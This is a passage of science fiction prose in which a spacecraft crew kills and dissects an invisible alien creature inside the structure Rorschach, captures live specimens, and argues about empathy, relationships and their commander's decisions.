+"Bates? Bates?" Another icon had bloomed in place of Link Down. The grunt was using radio for some reason—and though almost close enough to touch, I could barely make out the signal.
+A hash of Batespeak: "—to your—right in front of—" and Sascha as well, a bit more clearly: "—an't he see it?..."
+"See what? Sascha! Someone tell me what—see what?"
+"—read? Keeton, do you read?"
+Somehow Bates had boosted the signal; static roared like an ocean, but I could hear the words behind it. "Yes! What—"
+"Keep absolutely still, do you understand? Absolutely still. Acknowledge."
+"Acknowledged." The drone kept me in its shaky sights, dark stereocam irises spasming wide, stuttering to pinpoints. "Wha—"
+"There's something in front of you, Keeton. Directly between you and the grunt. Can't you see it?"
+"N-no. My HUD's down—"
+Sascha broke in: "How can he not see it it's right th—"
+Bates barked over her: "It's man-sized, radially symmetrical, eight, nine arms. Like tentacles, but—segmented. Spiky."
+"I don't see anything," I said. But I did: I saw something reaching for me, in my pod back aboard Theseus. I saw something curled up motionless in the ship's spine, watching as we laid our best plans.
+I saw Michelle the synesthesiac, curled into a fetal ball: You can't see it...it's in—visible...
+"What's it doing?" I called. Why can't I see it? Why can't I see it?
+"Just—floating there. Kind of waving. Oh, sh—Keet—"
+The grunt skidded sideways, as if slapped by a giant hand. It bounced off the wall and suddenly the laser link was back, filling the HUD with intelligence: first-person perspectives of Bates and Sascha racing along alien tunnels, a grunt's-eye view of a space suit with Keeton stenciled across its breastplate and there, right beside it, some thing like a rippling starfish with too many arms—
+The Gang barreled around the curve and now I almost could see something with my own eyes, flickering like heat-lightning off to one side. It was large, and it was moving, but somehow my eyes just slid off every time they tried to get a fix. It's not real, I thought, giddy with hysterical relief, it's just another hallucination but then Bates sailed into view and it was right there, no flickering, no uncertainty, nothing but a collapsed probability wave and solid, undeniable mass. Exposed, it grabbed the nearest wall and scrambled over our heads, segmented arms flailing like whips. A sudden crackling buzz in the back of my head and it was drifting free again, charred and smoking.
+A stuttering click. The whine of machinery gearing down. Three grunts hovered in formation in the middle of the passageway. One faced the alien. I glimpsed the tip of some lethal proboscis sliding back into its sheath. Bates shut the grunt down before it had finished closing its mouth.
+Optical links and three sets of lungs filled my helmet with a roar of heavy breathing.
+The offlined grunt drifted in the murky air. The alien carcass bumped gently off the wall, twitching: a hydra of human backbones, scorched and fleshless. It didn't look much like my on-board visions after all.
+For some reason I couldn't put my finger on, I found that almost reassuring.
+The two active grunts panned the fog until Bates gave them new orders; then one turned to secure the carcass, the other to steady its fallen comrade. Bates grabbed the dead grunt and unplugged its tether. "Fall back. Slowly. I'm right behind you."
+I tweaked my jets. Sascha hesitated. Coils of shielded cable floated about us like umbilical cords.
+"Now," Bates said, plugging a feed from her own suit directly into the offlined grunt.
+Sascha started after me. Bates took up the rear. I watched my HUD; a swarm of multiarmed monsters would appear there any moment.
+They didn't. But the blackened thing against the belly of Bates' machine was real enough. Not a hallucination. Not even some understandable artefact of fear and synesthesia. Rorschach was inhabited. Its inhabitants were invisible.
+Sometimes. Sort of.
+And, oh yeah. We'd just killed one.
+*
+
+Bates threw the deactivated grunt into the sky as soon as we'd made vacuum. Its comrades used it for target practice while we strapped in, firing and firing until there was nothing left but cooling vapor. Rorschach spun even that faint plasma into filigree before it faded.
+Halfway back to Theseus, Sascha turned to the Major: "You—"
+"No."
+"But— they do shit on their own, right? Autonomous."
+"Not when they're slaved."
+"Malfunction? Spike?"
+Bates didn't answer.
+She called ahead. By the time we made it back Cunningham had grown another little tumor on Theseus' spine, a remote surgery packed with teleops and sensors. One of the surviving grunts grabbed the carcass and jumped ship as soon as we passed beneath the carapace, completing the delivery as we docked.
+We were born again to the fruits of a preliminary necropsy. The holographic ghost of the dissected alien rose from ConSensus like some flayed and horrific feast. Its splayed arms looked like human spinal columns. We sat around the table and waited for someone else to take the first bite.
+"Did you have to shoot it with microwaves?" Cunningham sniped, tapping the table. "You completely cooked the animal. Every cell was blown out from the inside."
+Bates shook her head. "There was a malfunction."
+He gave her a sour look. "A malfunction that just happens to involve precise targeting of a moving object. It doesn't sound random to me."
+Bates looked back evenly. "Something flipped autonomous targeting from off to on. A coin toss. Random."
+"Random is—"
+"Give it a rest, Cunningham. I don't need this shit from you right now."
+His eyes rolled in that smooth dead face, focused suddenly on something overhead. I followed his gaze: Sarasti stared down at us like an owl panning for meadow voles, drifting slowly in the Coriolis breeze.
+No visor this time, either. I knew he hadn't lost it.
+He fixed Cunningham. "Your findings."
+Cunningham swallowed. Bits and pieces of alien anatomy flickered with color-coded highlights as he tapped his fingers. "Right, then. I'm afraid I can't give you much at the cellular level. There's not much left inside the membranes. Not many membranes left, for that matter. In terms of gross morphology, the specimen's dorsoventrally compressed and radially symmetrical, as you can see. Calcareous exoskeleton, keratinised plastic cuticle. Nothing special."
+Bates looked skeptical. "Plastic skin is 'nothing special'?"
+"Given the environment I was half-expecting a Sanduloviciu plasma. Plastic's simply refined petroleum. Organocarbon. This thing is carbon-based. It's even protein based, although its proteins are a great deal tougher than ours. Numerous sulphur cross-bonds for lateral bracing, as far as I could tell from what your grunts didn't denature." Cunningham's eyes looked past us all; his consciousness was obviously far aft, haunting remote sensors. "The thing's tissues are saturated with magnetite. On earth you find that material in dolphin brains, migratory birds, even some bacteria—anything that navigates or orients using magnetic fields. Moving up to macrostructures we've got a pneumatic internal skeleton, which as far as I can tell doubles as musculature. Contractile tissue squeezes gas through a system of bladders that stiffen or relax each segment in the arms."
+The light came back into Cunningham's eyes long enough to focus on his cigarette. He brought it to his mouth, dragged deeply, set it down again. "Note the invaginations around the base of each arm." Flaccid balloons glowed orange on the virtual carcass. "Cloacae, you could call them. Everything opens into them: they eat, breathe, and defecate through the same little compartment. No other major orifices."
+The Gang made a face that said Sascha, grossed out. "Don't things get—clogged up? Seems inefficient."
+"If one gets plugged, there's eight other doors into the same system. You'll wish you were so inefficient the next time you choke on a chicken bone."
+"What does it eat?" Bates asked.
+"I couldn't say. I found gizzard-like contractiles around the cloacae, which implies they chew on something, or did at some point in their history. Other than that..." He spread his hands; the cigarette left faint streamers in its wake. "Inflate those contractiles enough and you create an airtight seal, by the way. In conjunction with the cuticle, that would allow this organism to survive briefly in vacuum. And we already know it can handle the ambient radiation, although don't ask me how. Whatever it uses for genes must be a great deal tougher than ours."
+"So it can survive in space," Bates mused.
+"In the sense that a dolphin survives underwater. Limited time only."
+"How long?"
+"I'm not certain."
+"Central nervous system," Sarasti said.
+Bates and the Gang grew suddenly, subtly still. James's affect seeped out over her body, supplanting Sascha's.
+Smoke curled from Cunningham's mouth and nose. "There's nothing central about it, as it transpires. No cephalisation, not even clustered sense organs. The body's covered with something like eyespots, or chromatophores, or both. There are setae everywhere. And as far as I can tell—if all those little cooked filaments I've been able to put back together after your malfunction really are nerves and not something completely different—every one of those structures is under independent control."
+Bates sat up straight. "Seriously?"
+He nodded. "It would be akin to independently controlling the movement of each individual hair on your head, although this creature is covered with little hairs from tip to tip. The same thing applies to the eyes. Hundreds of thousands of eyes, all over the cuticle. Each one is barely more than a pinhole camera, but each is capable of independent focus and I'm guessing all the different inputs integrate somewhere up the line. The entire body acts like a single diffuse retina. In theory that gives it enormous visual acuity."
+"A distributed telescope array," Bates murmured.
+"A chromatophore underlies each eye—the pigment's some kind of cryptochrome so it's probably involved in vision, but it can also diffuse or contract through the local tissue. That implies dynamic pigment patterns, like a squid or a chameleon."
+"Background pattern-matching?" Bates asked. "Would that explain why Siri couldn't see it?"
+Cunningham opened a new window and played grainy looped imagery of Siri Keeton and his unseen dance partner. The creature I hadn't noticed was ominously solid to the cameras: a floating discoid twice as wide as my own torso, arms extending from its edges like thick knotted ropes. Patterns rippled across its surface in waves; sunlight and shadow playing on a shallow seabed.
+"As you can see, the background doesn't match the pattern," Cunningham said. "It's not even close."
+"Can you explain Siri's blindness to it?" Sarasti said.
+"I can't," Cunningham admitted. "It's beyond ordinary crypsis. But Rorschach makes you see all sorts of things that aren't there. Not seeing something that is there might come down to essentially the same thing."
+"Another hallucination?" I asked.
+Another shrug while Cunningham sucked smoke. "There are many ways to fool the human visual system. It's interesting that the illusion failed when multiple witnesses were present, but if you want a definitive mechanism you'll have to give me more to work with than that." He stabbed his cigarette hand at the crisped remains.
+"But—" James took a breath, bracing herself— "We're talking about something... sophisticated, at least. Something very complex. A great deal of processing power."
+Cunningham nodded again. "I'd estimate nervous tissue accounts for about thirty percent of body mass."
+"So it's intelligent." Her voice was almost a whisper.
+"Not remotely."
+"But—thirty percent—"
+"Thirty percent motor and sensory wiring." Another drag. "Much like an octopus; an enormous number of neurons, but half of them get used up running the suckers."
+"My understanding is that octopi are quite intelligent," James said.
+"By molluscan standards, certainly. But do you have any idea how much extra cabling you'd need if the photoreceptors in your eye were spread across your entire body? You'd need about three hundred million extension cords to begin with, ranging from half a millimeter to two meters long. Which means all your signals are staggered and out of synch, which means billions of additional logic gates to cohere the input. And that just gets you a single static image, with no filtering, no interpretation, no time-series integration at all." Shiver. Drag. "Now multiply that by all the extra wiring needed to focus all those eyespots on an object, or to send all that information back to individual chromatophores, and then add in the processing power you need to drive those chromatophores one at a time. Thirty percent might do all that, but I strongly doubt you'd have much left over for philosophy and science." He waved his hand in the general direction of the hold. "That—that—"
+"Scrambler," James suggested.
+Cunningham rolled his tongue around it. "Very well. That scrambler is an absolute miracle of evolutionary engineering. It's also dumb as a stick."
+A moment's silence.
+"So what is it?" James asked at last. "Somebody's pet?"
+"Canary in a coal mine," Bates suggested.
+"Perhaps not even that," Cunningham said. "Perhaps no more than a white blood cell with waldoes. Maintenance bot, maybe. Teleoperated, or instinct-driven. But people, we're ignoring far greater questions here. How could an anaerobe even develop complex multicellular anatomy, much less move as fast as this thing did? That level of activity burns a great deal of ATP."
+"Maybe they don't use ATP," Bates said as I thumbnailed: adenosine triphosphate. Cellular energy source.
+"It was crammed with ATP," Cunningham told her. "You can tell that much even with these remains. The question is, how can it synthesize the stuff fast enough to keep up with demand. Purely anaerobic pathways wouldn't suffice."
+Nobody offered any suggestions.
+"Anyway," he said, "So endeth the lesson. If you want gory details, check ConSensus." He wiggled the fingers of his free hand: the spectral dissection vanished. "I'll keep working, but if you want any real answers go get me a live one." He butted out his cigarette against the bulkhead and stared defiantly around the drum.
+The others hardly reacted; their topologies still sparkled from the revelations of a few minutes before. Perhaps Cunningam's pet peeve was more important to the Big Picture; perhaps, in a reductionist universe, biochemical basics should always take priority over the finer points of ETI and interspecies etiquette. But Bates and the Gang were time-lagged, processing earlier revelations. Not just processing, either: wallowing. They clung to Cunningham's findings like convicted felons who'd just discovered they might be freed on a technicality.
+Because the scrambler was dead at our hands, no doubt about it. But it wasn't an alien, not really. It wasn't intelligent. It was just a blood cell with waldoes. It was dumb as a stick.
+And property damage is so much easier to live with than murder.
+
+"Problems cannot be solved at the same level of awareness that created them"
+—Einstein
+
+Robert Paglino had set me up with Chelsea in the first place. Maybe he felt responsible when the relationship started jumping the rails. Or maybe Chelsea, Madam Fix-It that she was, had approached him for an intervention. For whatever reason, it was obvious the moment we took our seats at QuBit's that his invitation had not been entirely social.
+He went for some neurotrope cocktail on the rocks. I stuck with Rickard's.
+"Still old-school," Pag said.
+"Still into foreplay," I observed.
+"That obvious, huh?" He took a sip. "That'll teach me to try the subtle approach with a professional jargonaut."
+"Jargonaut's got nothing to do with it. You wouldn't have fooled a border collie." Truth be told, Pag's topology never really told me much that I didn't already know. I never really had much of an edge in reading him. Maybe we just knew each other too well.
+"So," he said, "spill."
+"Nothing to spill. She just got to know the real me."
+"That is bad."
+"What'd she tell you?"
+"Me? Nothing at all."
+I gave him a look over the top of my glass.
+He sighed. "She knows you're cheating on her."
+"I'm what?"
+"Cheating. With the skin."
+"It's based on her!"
+"But it isn't her."
+"No it isn't. It doesn't fart or fight or break into tears every time you don't want to be dragged off to meet its family. Look, I love the woman dearly, but come on. When was the last time you tried first-person fucking?"
+"Seventy-four," he said.
+"You're kidding." I'd have guessed never.
+"Did some third-world medical missionary work between gigs. They still bump and grind in Texas." Pag swigged his trope. "Actually, I thought it was alright."
+"The novelty wears off."
+"Evidently."
+"And it's not like I'm doing anything unusual here, Pag. She's the one with the kink. And it's not just the sex. She keeps asking about—she keeps wanting to know things."
+"Like what?"
+"Irrelevant stuff. My life as a kid. My family. Nobody's fucking business."
+"She's just taking an interest. Not everyone considers childhood memories off-limits, you know."
+"Thanks for the insight." As if people had never taken an interest before. As if Helen hadn't taken an interest when she went through my drawers and filtered my mail and followed me from room to room, asking the drapes and the furniture why I was always so sullen and withdrawn. She'd taken such an interest that she wouldn't let me out the door until I confided in her. At twelve I'd been stupid enough to throw myself on her mercy, It's personal, Mom. I'd just rather not talk about it. Then I'd made my escape into the bathroom when she demanded to know if it was trouble online, trouble at school, was it a girl, was it a—a boy, what was it and why couldn't I just trust my own mother, don't I know I can trust her with anything? I waited out the persistent knocking and the insistent concerned voice through the door and the final, grudging silence that followed. I waited until I was absolutely sure she'd gone away, I waited for five fucking hours before I came out and there she was, arms folded in the hall, eyes brimming with reproach and disappointment. That night she took the lock off the bathroom door because family should never shut each other out. Still taking an interest.
+"Siri," Pag said quietly.
+I slowed my breathing, tried again: "She doesn't just want to talk about family. She wants to meet them. She keeps trying to drag me to meet hers. I thought I was hooking up with Chelsea, you know, nobody ever told me I'd have to share airspace with..."
+"You do it?"
+"Once." Reaching, grasping things, feigning acceptance, feigning friendship. "It was great, if you like being ritually pawed by a bunch of play-acting strangers who can't stand the sight of you and don't have the guts to admit it."
+Pag shrugged, unsympathetic. "Sounds like typical old-school family. You're a synthesist, man. You deal with way wonkier dynamics than that."
+"I deal with other people's information. I don't vomit my own personal life into the public sphere. Whatever hybrids and the constructs I work with, they don't—"
+—touch—
+"Interrogate," I finished.
+"You knew Chelse was an old-fashioned girl right off the top."
+"Yeah, when it suits her." I gulped ale. "But she's cutting-edge when she's got a splicer in her hand. Which isn't to say that her strategies couldn't use some work."
+"Strategies."
+It's not a strategy, for God's sake! Can't you see I'm hurting? I'm on the fucking floor, Siri, I'm curled up in a ball because I'm hurting so much and all you can do is criticize my tactics? What do I have to do, slash my goddamn wrists?
+I'd shrugged and turned away. Nature's trick.
+"She cries," I said now. "High blood-lactate levels, makes it easy for her. It's just chemistry but she holds it up like it was some kind of IOU."
+Pag pursed his lips. "Doesn't mean it's an act."
+"Everything's an act. Everything's strategy. You know that." I snorted. "And she's miffed because I base a skin on her?"
+"I don't think it's so much the actual skin as the fact that you didn't tell her. You know how she feels about honesty in relationships."
+"Sure. She doesn't want any."
+He looked at me.
+"Give me some credit, Pag. You think I should tell her that sometimes the sight of her makes me shudder?"
+The system called Robert Paglino sat quietly, and sipped his drugs, and set the things he was about to say in order. He took a breath.
+"I can't believe you could be so fucking dumb," he said.
+"Yeah? Enlighten me."
+"Of course she wants you to tell her you only have eyes for her, you love her pores and her morning breath, and why stop at one tweak how about ten. But that doesn't mean she wants you to lie, you idiot. She wants all that stuff to be true. And—well, why can't it be?"
+"It isn't," I said.
+"Jesus, Siri. People aren't rational. You aren't rational. We're not thinking machines, we're—we're feeling machines that happen to think." He took a breath, and another hit. "And you already know that, or you couldn't do your job. Or at least—" He grimaced— "the system knows."
+"The system."
+Me and my protocols, he meant. My Chinese Room.
+I took a breath. "It doesn't work with everyone, you know."
+"So I've noticed. Can't read systems you're too entangled with, right? Observer effect."
+I shrugged.
+"Just as well," he said. "I don't think I'd like you all that much in that room of yours."
+It came out before I could stop it: "Chelse says she'd prefer a real one."
+He raised his eyebrows. "Real what?"
+"Chinese Room. She says it would have better comprehension."
+The Qube murmured and clattered around us for a few moments.
+"I can see why she'd say that," Pag said at last. "But you— you did okay, Pod-man."
+"I dunno."
+He nodded, emphatic. "You know what they say about the road less traveled? Well, you carved your own road. I don't know why. It's like learning calligraphy using your toes, you know? Or proprioceptive polyneuropathy. It's amazing you can do it at all; it's mindboggling that you actually got good at it."
+I squinted at him. "Proprio—"
+"There used to be people without any sense of—well, of themselves, physically. They couldn't feel their bodies in space, had no idea how their own limbs were arranged or even if they had limbs. Some of them said they felt pithed. Disembodied. They'd send a motor signal to the hand and just have to take it on faith that it arrived. So they'd use vision to compensate; they couldn't feel where the hand was so they'd look at it while it moved, use sight as a substitute for the normal force-feedback you and I take for granted. They could walk, if they kept their eyes focused on their legs and concentrated on every step. They'd get pretty good at it. But even after years of practice, if you distracted them in mid-step they'd go over like a beanstalk without a counterweight."
+"You're saying I'm like that?"
+"You use your Chinese room the way they used vision. You've reinvented empathy, almost from scratch, and in some ways—not all obviously, or I wouldn't have to tell you this—but in some ways yours is better than the original. It's why you're so good at synthesis."
+I shook my head. "I just observe, that's all. I watch what people do, and then I imagine what would make them do that."
+"Sounds like empathy to me."
+"It's not. Empathy's not so much about imagining how the other guy feels. It's more about imagining how you'd feel in the same place, right?"
+Pag frowned. "So?"
+"So what if you don't know how you'd feel?"
+He looked at me, and his surfaces were serious and completely transparent. "You're better than that, friend. You may not always act like it, but—I know you. I knew you before."
+"You knew someone else. I'm Pod-man, remember?"
+"Yeah, that was someone else. And maybe I remember him better than you do. But I'll tell you one thing." He leaned forward. "Both of you would've helped me out that day. And maybe he would've got there with good ol'-fashioned empathy while you had to cobble together some kind of improvised flowchart out of surplus parts, but that just makes your accomplishment all the greater. Which is why I continue to stick it out with you, old buddy. Even though you have a rod up your ass the size of the Rio Spire."
+He held out his glass. Dutifully, I clinked it against my own. We drank.
+"I don't remember him," I said after a while.
+"What, the other Siri? Pre-Pod Siri?"
+I nodded.
+"Nothing at all?"
+I thought back. "Well, he was wracked by convulsions all the time, right? There'd be constant pain. I don't remember any pain." My glass was almost empty; I sipped to make it last. "I—I dream about him sometimes, though. About— being him."
+"What's it like?"
+"It was—colorful. Everything was more saturated, you know? Sounds, smells. Richer than life."
+"And now?"
+I looked at him.
+"You said it was colorful. What changed?"
+"I don't know. Maybe nothing. I just— I don't actually remember the dreams when I wake up any more."
+"So how do you know you still have them?" Pag asked.
+Fuck it I thought, and tipped back the last of my pint in a single gulp. "I know."
+"How?"
+I frowned, taken aback. I had to think for a few moments before I remembered.
+"I wake up smiling," I said.
+
+"Grunts look the enemy in the eye. Grunts know the stakes. Grunts know the price of poor strategy. What do the generals know? Overlays and Tactical plots. The whole chain of command is upside-down."
+—Kenneth Lubin, Zero Sum
+
+It went bad from the moment we breached. The plan had called for precise havoc along the new beachhead, subtly arranged to entrap some blood-cell-with-waldoes as it sought to repair the damage. Our job had been to set the trap and stand back, trusting Sarasti's assurances that we would not have long to wait.
+We had no time at all. Something squirmed in the swirling dust the moment we breached, serpentine movement down the hole that instantly kicked Bates renowned field initiative into high gear. Her grunts dived through and caught a scrambler twitching in their crosshairs, clinging to the wall of the passageway. It must have been stunned by the blast of our entry, a classic case of wrong-place-wrong-time. Bates took a split-second to appraise the opportunity and the plan was plasma.
+One of the grunts plugged the scrambler with a biopsy dart before I even had a chance to blink. We would have bagged the whole animal right then if Rorschach's magnetosphere hadn't chosen that moment to kick sand in our faces. As it was, by the time our grunts staggered back into action their quarry was already disappearing around the bend. Bates was tethered to her troops; they yanked her down the rabbit hole ("Set it up!" she yelled back at Sascha) the moment she let them loose.
+I was tethered to Bates. I barely had a chance to exchange a wide-eyed look with Sascha before being yanked away in turn. Suddenly I was inside again; the sated biopsy dart bounced off my faceplate and flashed past, still attached to a few meters of discarded monofilament. Hopefully Sascha would pick it up while Bates and I were hunting; at least the mission wouldn't be a total loss if we never made it back.
+The grunts dragged us like bait on a hook. Bates flew like a dolphin just ahead of me, keeping effortlessly to the center of the bore with an occasional tweak of her jets. I careened off the walls just behind, trying to stabilize myself, trying to look as though I too might be in control. It was an important pretense. The whole point of being a decoy is to pass yourself off as an original. They'd even given me my own gun, pure precaution of course, more for comfort than protection. It hugged my forearm and fired plastic slugs impervious to induction fields.
+Just Bates and I, now. A pacifist soldier, and the odds of a coin toss.
+Gooseflesh prickled my skin as it always had. The usual ghosts scrabbled and clawed through my mind. This time, though, the dread seemed muted. Distant. Perhaps it was just a matter of timing, perhaps we were moving so quickly through the magnetic landscape that no one phantom had a chance to stick. Or maybe it was something else. Maybe I wasn't so afraid of ghosts because this time we were after monsters.
+The scrambler seemed to have thrown off whatever cobwebs our entrance had spun; it surged along the walls now at full speed, its arms shooting ahead like a succession of striking snakes, slinging the body forward so fast the drones could barely keep it in sight, a writhing silhouette in the fog. Suddenly it leapt sideways, sailing across the width of the passageway and down some minor tributary. The grunts veered in pursuit, crashing into walls, stumbling—
+—stopping—
+—and suddenly Bates was braking hard, shooting back past me as I flailed with my pistol. I was past the drones in the next instant; my leash snapped tight and snapped back, bringing me to a dead drifting stop. For a second or two I was on the front line. For a second or two I was the front line, Siri Keeton, note taker, mole, professional uncomprehender. I just floated there, breath roaring in my helmet, as a few meters further on the walls—
+Squirmed...
+Peristalsis, I thought at first. But this motion was utterly unlike the slow, undulating waves that usually rippled along Rorschach's passageways. So hallucination, I thought instead— and then those writhing walls reached out with a thousand whiplike calcareous tongues that grabbed our quarry from every direction and tore it to pieces...
+Something grabbed me and spun me around. Suddenly I was locked against the chest of one of the grunts, its rear guns firing as we retreated back up the tunnel at full speed. Bates was in the arms of the other. Seething motion receded behind us but the image stayed stuck to the backs of my eyes, hallucinatory and point-blank in its clarity:
+Scramblers, everywhere. A seething infestation squirming across the walls, reaching out for the intruder, leaping into the lumen of the passageway to press their counterattack.
+Not against us. They had attacked one of their own. I'd seen three of its arms ripped off before it had disappeared into a writhing ball in the center of the passageway.
+We fled. I turned to Bates—Did you see—but held my tongue. The deathly concentration on her face was unmistakable even across two faceplates and three meters of methane. According to HUD she'd lobotomized both grunts, bypassed all that wonderful autonomous decision-making circuitry entirely. She was running both machines herself, as manually as marionettes.
+Grainy turbulent echoes appeared on the rear sonar display. The scramblers had finished with their sacrifice. Now they were coming after us. My grunt stumbled and careened against the side of the passage. Jagged shards of alien décor dug parallel gouges across my faceplate, tenderized chunks of thigh through the shielded fabric of my suit. I clenched down on a cry. It got out anyway. Some ridiculous in-suit alarm chirped indignantly an instant before a dozen rotten eggs broke open inside my helmet. I coughed. My eyes stung and watered in the reek; I could barely see Seiverts on the HUD, flashing instantly into the red.
+Bates drove us on without a word.
+My faceplate healed enough to shut off the alarm. My air began to clear. The scramblers had gained; by the time I could see clearly again they were only a few meters behind us. Up ahead Sascha came into view around the bend, Sascha who had no backup, whose other cores had all been shut down on Sarasti's orders. Susan had protested at first—
+"If there's any opportunity to communicate—"
+"There won't be," he'd said.
+—so there was Sascha who was more resistant to Rorschach's influence according to some criterion I never understood, curled up in a fetal ball with her gloves clamped against her helmet and I could only hope to some dusty deity that she'd set the trap before this place had got to her. And here came the scramblers, and Bates was shouting "Sascha! Get out of the fucking way!" and braking hard, way too soon, the scrambling horde nipping at our heels like a riptide and Bates yelled "Sascha!" again and finally Sascha moved, kicked herself into gear and off the nearest wall and fled right back up the hole we'd blown in through. Bates yanked some joystick in her head and our warrior sedans slewed and shat sparks and bullets and dove out after her.
+Sascha had set the trap just within the mouth of the breach. Bates armed it in passing with the slap of one gloved hand. Motion sensors were supposed to do the rest— but the enemy was close behind, and there was no room to spare.
+It went off just as I was emerging into the vestibule. The cannon net shot out behind me in a glorious exploding conic, caught something, snapped back up the rabbit hole and slammed into my grunt from behind. The recoil kicked us against the top of the vestibule so hard I thought the fabric would tear. It held, and threw us back against the squirming things enmeshed in our midst.
+Writhing backbones everywhere. Articulated arms, lashing like bony whips. One of them entwined my leg and squeezed like a brick python. Bates' hands waved in a frantic dance before me and that arm came apart into dismembered segments, bouncing around the enclosure.
+This was all wrong. They were supposed to be in the net, they were supposed to be contained...
+"Sascha! Launch!" Bates barked. Another arm separated from its body and careened into the wall, coiling and uncoiling.
+The hole had flooded with aerosol foam-core as soon as we'd pulled the net. A scrambler writhed half-embedded in that matrix, caught just a split-second too late; its central mass protruded like some great round tumor writhing with monstrous worms.
+"SASCHA!"
+Artillery. The floor of the vestibule irised shut quick as a leg-hold trap and everything slammed against it, grunts, people, scramblers whole and in pieces. I couldn't breathe. Every thimbleful of flesh weighed a hundred kilograms. Something slapped us to one side, a giant hand batting an insect. Maybe a course correction. Maybe a collision.
+But ten seconds later we were weightless again, and nothing had torn us open.
+We floated like mites in a ping-pong ball, surrounded by a confusion of machinery and twitching body parts. There was little of anything that might pass for blood. What there was floated in clear, shuddering spherules. The cannon net floated like a shrink-wrapped asteroid in our midst. The things inside had wrapped their arms around themselves, around each other, curled into a shivering and unresponsive ball. Compressed methonia hissed around them, keeping them fresh for the long trip home.
+"Holy shit," Sascha breathed, watching them. "The bloodsucker called it."
+He hadn't called everything. He hadn't called a mob of multiarmed aliens ripping one of their own to pieces before my eyes. He hadn't seen that coming.
+Or at least, he hadn't mentioned it.
+I was already feeling nauseous. Bates was carefully bringing her wrists together. For a moment I could barely make out a taut dark thread of freakwire, fine as smoke, between them. Her caution was well-advised; that stuff would slice through human limbs as easily as alien ones. One of the grunts groomed its mouthparts at her shoulder, cleaning gore from its mandibles.
+The freakwire vanished from my sight. Sight itself was dimming, now. The inside of this great lead balloon was going dark around me. We were coasting, purely ballistic. We had to trust that Scylla would swoop in and snatch us once we'd achieved a discreet distance from the scene of the crime. We had to trust Sarasti.
+That was getting harder by the hour. But he'd been right so far. Mostly.
+"How do you know?" Bates had asked when he'd first laid out the plan. He hadn't answered. Chances are he couldn't have, not to us, any more than a baseline could have explained brane theory to the inhabitants of Flatland. But Bates hadn't been asking about tactics anyway, not really. Maybe she'd been asking for a reason, for something to justify this ongoing trespass into foreign soil, the capture and slaughter of its natives.
+On one level she already knew the reason, of course. We all did. We could not afford to merely react. The risks were too great; we had to preempt. Sarasti, wise beyond all of us, saw this more clearly than we. Amanda Bates knew he was right in her mind—but perhaps she didn't feel it in her gut. Perhaps, I thought as my vision failed, she was asking Sarasti to convince her.
+But that wasn't all she was doing.
+
+*
+
+Imagine you are Amanda Bates.
+The control you wield over your troops would give wet dreams and nightmares to generals of ages past. You can drop instantly into the sensorium of anyone under your command, experience the battlefield from any number of first-person perspectives. Your every soldier is loyal unto death, asking no questions, obeying all commands with alacrity and dedication to which mere flesh could never even aspire. You don't just respect a chain of command: you are one.
+You are a little bit scared of your own power. You are a little bit scared of the things you've already done with it.
+Taking orders comes as naturally as giving them. Oh, you've been known to question policy on occasion, or seek a bigger picture than may be strictly necessary for the job at hand. Your command initiative has become the stuff of legends. But you have never disobeyed a direct order. When asked for your perspective, you serve it straight up and unvarnished— until the decision is made, and the orders handed down. Then you do your job without question. Even when questions arise, you would hardly waste time asking them unless you expected an answer you could use.
+Why, then, demand analytical details from a vampire?
+Not for information. Might as well expect the sighted to explain vision to the congenitally blind. Not for clarification; there was no ambiguity in Sarasti's bottom line. Not even for the benefit of poor dumb Siri Keeton, who may have missed some salient point but is too ashamed to raise his own hand.
+No, there is only one reason why you might ask for such details: to challenge. To rebel, to the infinitesimal degree that rebellion is permitted once the word is given.
+You argued and advocated as forcefully as you could, back when Sarasti was soliciting input. But he ignored yours, abandoned any attempt at communication and preemptively invaded foreign territory. He knew that Rorschach might contain living beings and still he tore it open without regard for their welfare. He may have killed helpless innocents. He may have roused an angry giant. You don't know.
+All you know is, you've been helping him do it.
+You've seen this kind of arrogance before, among your own kind. You had hoped that smarter creatures would be wiser ones. Bad enough to see such arrogant stupidity inflicted on the helpless, but to do it at these stakes beggars belief. Killing innocents is the least of the risks you're running; you're gambling with the fate of worlds, provoking conflict with a star faring technology whose sole offense was to take your picture without permission.
+Your dissent has changed nothing. So you rein it in; all that slips out now is the occasional pointless question with no hope of an answer, its inherent insubordination so deeply buried you don't even see it yourself. If you did see it, you'd keep your mouth shut entirely—because the last thing you want is to remind Sarasti that you think he's wrong. You don't want him dwelling on that. You don't want him to think you're up to something.
+Because you are. Even if you're not quite ready to admit it to yourself.
+Amanda Bates is beginning to contemplate a change of command.
+
+*
+
+The laceration of my suit had done a real number on the gears. It took three solid days for Theseus to bring me back to life. But death was no excuse for falling behind the curve; I resurrected with a head full of updates clogging my inlays.
+I flipped through them, climbing down into the drum. The Gang of Four sat at the galley below me, staring at untouched portions of nutritionally-balanced sludge on her plate. Cunningham, over in his inherited domain, grunted at my appearance and turned back to work, the fingers of one hand tapping compulsively on the desktop.
+Theseus' orbit had widened during my absence, and most of its eccentricities had been planed away. Now we kept our target in view from a more-or-less constant range of three thousand kilometers. Our orbital period lagged Rorschach's by an hour—the alien crept implacably ahead of us along its lower trajectory—but a supplementary burn every couple of weeks would be enough to keep it in sight. We had specimens now, things to be examined under conditions of our own choosing; no point in risking any more close approaches until we'd wrung every useful datum from what we had.
+Cunningham had expanded his lab space during my time in the sepulcher. He'd built holding pens, one for each scrambler, modules partitioned by a common wall and installed in a whole new hab. The microwaved carcass had been sidelined like a discarded toy from a previous birthday, although according to the access logs Cunningham still visited it every now and then.
+Not that he visited any part of the new wing in person, of course. Not that he was even able to, not without suiting up and jumping across the hold. The whole compartment had been disconnected from its spinal lock and pushed to a tethered anchorage midway between spine and carapace: Sarasti's orders, given to minimize risk of contamination. It was no skin off Cunningham's nose. He was happier leaving his body in pseudogravity anyway, while his consciousness flitted between the waldoes and sensors and bric-a-brac surrounding his new pets.
+Theseus saw me coming and pushed a squeezebulb of sugary electrolytes from the galley dispenser. The Gang didn't look up as I passed. One forefinger tapped absently against their temple, the lips pursed and twitched in the characteristic mode that said internal dialog in progress. I could never tell who was on top when they were like that.
+I sucked on the squeezebulb and looked in on the pens. Two cubes suffused in pale red light: in one a scrambler floated center stage, waving its segmented arms like seaweed in gentle surge. The occupant of the other cage was squeezed into a corner, four arms splayed across the converging walls; four others extended, waving again, into open space. The bodies from which those arms sprouted were spheroids, not flattened disks as our first—sample had been. They were only slightly compressed, and their arms sprouted not from a single equatorial band but from across the whole surface.
